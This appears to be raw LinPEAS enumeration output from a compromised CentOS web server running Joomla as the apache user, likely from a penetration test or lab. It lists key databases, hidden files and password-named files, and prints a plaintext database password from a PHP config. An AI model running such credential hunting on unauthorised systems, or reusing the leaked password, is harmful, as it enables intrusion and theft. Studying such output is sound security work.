-rw-r--r--. 1 root root 212 Mar 17  2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_ethtool_2.conf
-rw-r--r--. 1 root root 241 Mar 17  2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_ethtool_3.conf
-rw-r--r--. 1 root root 447 Mar 17  2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_multi_lw_1.conf
-rw-r--r--. 1 root root 285 Mar 17  2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_nsna_ping_1.conf
-rw-r--r--. 1 root root 318 Mar 17  2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_tipc.conf
-rw-r--r--. 1 root root 2761 Aug  8  2019 /usr/share/man/man1/db_hotbackup.1.gz
-r--r--r--. 1 root root 2797 Aug  8  2019 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 5018 Aug  8  2019 /usr/share/nmap/scripts/http-backup-finder.nse
-rw-r--r-- 1 root root 6904 Aug  8  2019 /usr/share/nmap/scripts/http-config-backup.nse

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /etc/aliases.db: Berkeley DB (Hash, version 9, native byte-order)
Found /etc/openldap/certs/cert8.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /etc/openldap/certs/key3.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /etc/openldap/certs/secmod.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /etc/pki/nssdb/cert8.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /etc/pki/nssdb/cert9.db: SQLite 3.x database
Found /etc/pki/nssdb/key3.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /etc/pki/nssdb/key4.db: SQLite 3.x database
Found /etc/pki/nssdb/secmod.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /var/lib/yum/history/history-2019-12-14.sqlite: regular file, no read permission

 -> Extracting tables from /etc/pki/nssdb/cert9.db (limit 20)
 -> Extracting tables from /etc/pki/nssdb/key4.db (limit 20)

╔══════════╣ Web files?(output limit)
/var/www/:
total 4.0K
drwxr-xr-x.  4 root   root     33 Dec 14  2019 .
drwxr-xr-x. 20 root   root    278 Dec 14  2019 ..
drwxr-xr-x.  2 root   root      6 Aug  8  2019 cgi-bin
drwxr-xr-x. 17 apache apache 4.0K Oct  1 00:52 html

/var/www/cgi-bin:
total 0
drwxr-xr-x. 2 root root  6 Aug  8  2019 .

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r--. 1 root root 167 Aug  7  2019 /boot/.vmlinuz-3.10.0-1062.el7.x86_64.hmac
-rw-r--r-- 1 root root 0 Sep 30 22:09 /run/initramfs/.need_shutdown
-rw-r--r--. 1 root root 18 Aug  8  2019 /etc/skel/.bash_logout
-rw-r--r--. 1 root root 129 Aug  8  2019 /etc/selinux/targeted/.policy.sha512
-rw-------. 1 root root 0 Dec 14  2019 /etc/.pwd.lock
-rw-r--r--. 1 root root 163 Dec 14  2019 /etc/.updated
-rw-r--r--. 1 root root 0 Dec 14  2019 /var/lib/rpm/.rpm.lock
-rw-r--r--. 1 root root 163 Dec 14  2019 /var/.updated
-rwxr-xr-x. 1 apache apache 150 Apr 25  2017 /var/www/html/libraries/vendor/.htaccess
-rw-r--r--. 1 root root 65 Aug  2  2017 /usr/lib64/.libgcrypt.so.11.hmac
-rw-r--r--. 1 root root 65 Aug  8  2019 /usr/lib64/.libcrypto.so.1.0.2k.hmac
-rw-r--r--. 1 root root 65 Aug  8  2019 /usr/lib64/.libssl.so.1.0.2k.hmac
-rw-r--r--. 1 root root 40 Aug  8  2019 /usr/share/man/man1/..1.gz
-rw-r--r--. 1 root root 42 Jan 29  2019 /usr/share/man/man5/.k5identity.5.gz
-rw-r--r--. 1 root root 2328 Apr 23  2013 /usr/share/kde4/apps/kdm/themes/CentOS7/.colorlsCZ1
-rw-r--r-- 1 root root 0 Dec 14  2019 /.autorelabel

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxrwxrwx 1 apache apache 848317 Aug 27 00:28 /tmp/linpeas.sh
-rw-r--r-- 1 apache apache 3736 Sep  9  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/base/repomd.xml
-rw-r--r-- 1 apache apache 0 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/base/cachecookie
-rw-r--r-- 1 apache apache 543 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/base/mirrorlist.txt
-rw-r--r-- 1 apache apache 5479 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/epel/repomd.xml
-rw-r--r-- 1 apache apache 0 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/epel/cachecookie
-rw-r--r-- 1 apache apache 18150 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/epel/metalink.xml
-rw-r--r-- 1 apache apache 2993 Oct 22  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/extras/repomd.xml
-rw-r--r-- 1 apache apache 0 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/extras/cachecookie
-rw-r--r-- 1 apache apache 568 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/extras/mirrorlist.txt
-rw-r--r-- 1 apache apache 3097 Dec 14  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-php56/repomd.xml
-rw-r--r-- 1 apache apache 0 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-php56/cachecookie
-rw-r--r-- 1 apache apache 3056 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-php56/mirrorlist.txt
-rw-r--r-- 1 apache apache 3106 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-safe/repomd.xml
-rw-r--r-- 1 apache apache 0 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-safe/cachecookie
-rw-r--r-- 1 apache apache 3121 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-safe/mirrorlist.txt
-rw-r--r-- 1 apache apache 3007 Dec 12  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/updates/repomd.xml
-rw-r--r-- 1 apache apache 0 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/updates/cachecookie
-rw-r--r-- 1 apache apache 602 Dec 15  2019 /var/tmp/yum-apache-Oxz_mT/x86_64/7/updates/mirrorlist.txt

╔══════════╣ Searching passwords in config PHP files
	public $password = 'nv5uz9r3ZEDzVjNu';
			$this->password = (empty($this->options['db_pass'])) ? '' : $this->options['db_pass'];
			$this->password = null;
			'password' => $this->password,

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/openldap/certs/password
/etc/pam.d/password-auth
/etc/pam.d/password-auth-ac
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
  #)There are more creds/passwds files in the previous parent folder

/usr/lib64/mysql/plugin/mysql_clear_password.so
/usr/sbin/grub2-setpassword
/usr/share/doc/openssh-7.4p1/PROTOCOL.key
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man5/password-auth-ac.5.gz
/usr/share/man/man5/password-auth.5.gz
/usr/share/man/man8/grub2-setpassword.8.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/nmap/nselib/data/passwords.lst
/usr/share/nmap/scripts/creds-summary.nse
/usr/share/nmap/scripts/http-domino-enum-passwords.nse
/usr/share/nmap/scripts/ms-sql-empty-password.nse
/usr/share/nmap/scripts/mysql-empty-password.nse
  #)There are more creds/passwds files in the previous parent folder

/var/www/html/libraries/cms/form/rule/password.php
/var/www/html/libraries/fof/form/field/password.php
/var/www/html/libraries/joomla/crypt/password
/var/www/html/libraries/joomla/crypt/password.php
/var/www/html/libraries/joomla/form/fields/password.php
/var/www/html/libraries/vendor/ircmaxell/password-compat
/var/www/html/libraries/vendor/ircmaxell/password-compat/lib/password.php
/var/www/html/media/system/js/passwordstrength.js

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs